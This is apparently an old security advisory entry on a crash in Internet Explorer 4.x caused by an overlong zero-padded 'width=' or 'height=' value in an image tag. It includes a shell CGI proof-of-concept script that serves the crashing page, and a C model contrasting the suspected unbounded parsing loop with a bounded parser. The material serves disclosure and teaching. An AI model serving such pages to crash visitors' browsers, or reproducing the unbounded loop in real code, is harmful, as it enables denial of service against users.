COMMAND
MS IE
SYSTEMS AFFECTED
Win 9x, NT
PROBLEM
Jim Paris found the following. When MSIE 4.x (tested on 4.0 and
4.01 SP1) receives a long "width=000..." value in an <img> tag, it
crashes. The same goes for "height=...". See:
http://home.jtan.com/~jim/bugs/
for a more detailed description of this bug; the details below are taken from there.
In most cases, IE stops parsing the "width=" string once the
maximum width or height has been reached. When the value consists of
zeros, however, no maximum is ever reached, and the browser keeps
reading the string, presumably overwriting some fixed-size buffer.
This bug is hard to reproduce. It seems to work best when the page is
opened in a new window and is not cached. The "Expires:" header
emitted by the CGI script ensures that the page will not be cached,
and the link that loads the script uses "target=_new" so that it
opens in a new window. This has been tested on IE 4.0 (4.71.1712.6)
and 4.01 SP1 (4.72.3110.8). CGI script:
#!/bin/sh
# Emits the CGI headers, the blank line that terminates them, and then
# the page carrying the overlong "width=" value. The blank line after
# "Expires:" is required by CGI; without it the server would treat the
# HTML as further header lines and fail the request.
cat << EOF
Content-type: text/html
Expires: Tue, 01 Jan 1980 00:00:00 GMT

<html><head><title>IE "width=000..." bug</title></head><body>
<img width=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001>
Your browser is unaffected by this bug.
You can close this window.
</body></html>
EOF
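The explanation above (the parser stops when the accumulated value passes the cap, so a run of zeros never stops it) is easier to reason about in code. The block below is an added example written for this entry, not code from Jim Paris's page or from IE: it is a model of the suspected parsing loop next to a bounded replacement. The cap MAX_DIM, the scratch-buffer size SCRATCH_LEN, the digit limit MAX_DIGITS and the 200-zero test input are all assumptions; the page states none of IE's real values. The model only counts how many characters the unbounded loop would write, it does not overrun memory itself.

```c
#include <stdio.h>
#include <string.h>

/* All limits below are assumptions made for this model; the page gives
   neither IE's real dimension cap nor the size of the buffer it overruns. */
#define MAX_DIM     32767   /* assumed: largest accepted pixel dimension */
#define SCRATCH_LEN 16      /* assumed: size of the fixed scratch buffer */
#define MAX_DIGITS  6       /* hardened parser: longest digit run accepted */
#define ZERO_RUN    200     /* constructed input: number of leading zeros */

/* Model of the suspected IE behaviour: walk the digit run, copying each
   digit into a fixed-size scratch area, and stop only once the accumulated
   value exceeds MAX_DIM. Returns how many characters it would have written.
   A run of zeros never exceeds the cap, so the whole run is consumed. */
size_t digits_consumed_unbounded(const char *attr)
{
    size_t n = 0;
    long value = 0;
    while (attr[n] >= '0' && attr[n] <= '9') {
        value = value * 10 + (attr[n] - '0');
        n++;
        if (value > MAX_DIM)   /* cap reached: this is the only exit */
            break;
    }
    return n;
}

/* 1 if the modelled parser would write past the scratch buffer, else 0. */
int would_overrun(const char *attr)
{
    return digits_consumed_unbounded(attr) > SCRATCH_LEN;
}

/* Hardened parser: bound the digit run before touching any buffer, and
   saturate at MAX_DIM instead of relying on the cap to end the loop.
   Returns -1 for an empty or overlong digit run (attribute is ignored). */
long parse_dim_bounded(const char *attr)
{
    size_t n = strspn(attr, "0123456789");
    long value = 0;
    if (n == 0 || n > MAX_DIGITS)
        return -1;
    for (size_t i = 0; i < n; i++) {
        value = value * 10 + (attr[i] - '0');
        if (value > MAX_DIM)
            return MAX_DIM;
    }
    return value;
}

/* Constructed input in the shape of the page's test case: ZERO_RUN zeros
   followed by "1", i.e. the value part of width=000...0001. */
const char *zero_attr(void)
{
    static char buf[ZERO_RUN + 2];
    memset(buf, '0', ZERO_RUN);
    buf[ZERO_RUN] = '1';
    buf[ZERO_RUN + 1] = '\0';
    return buf;
}

int main(void)
{
    const char *inputs[] = { "640", "99999", zero_attr() };
    for (size_t i = 0; i < 3; i++) {
        printf("%.20s%s: consumed=%zu overrun=%d hardened=%ld\n",
               inputs[i], strlen(inputs[i]) > 20 ? "..." : "",
               digits_consumed_unbounded(inputs[i]),
               would_overrun(inputs[i]), parse_dim_bounded(inputs[i]));
    }
    return 0;
}
```

The point of the comparison is where the loop's exit condition lives: the modelled parser trusts the numeric cap to end the loop, which a value that never grows defeats, whereas the bounded parser limits the number of characters it will look at before it computes anything, so the length of the attribute can no longer influence how much is written.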
SOLUTION
Nothing yet.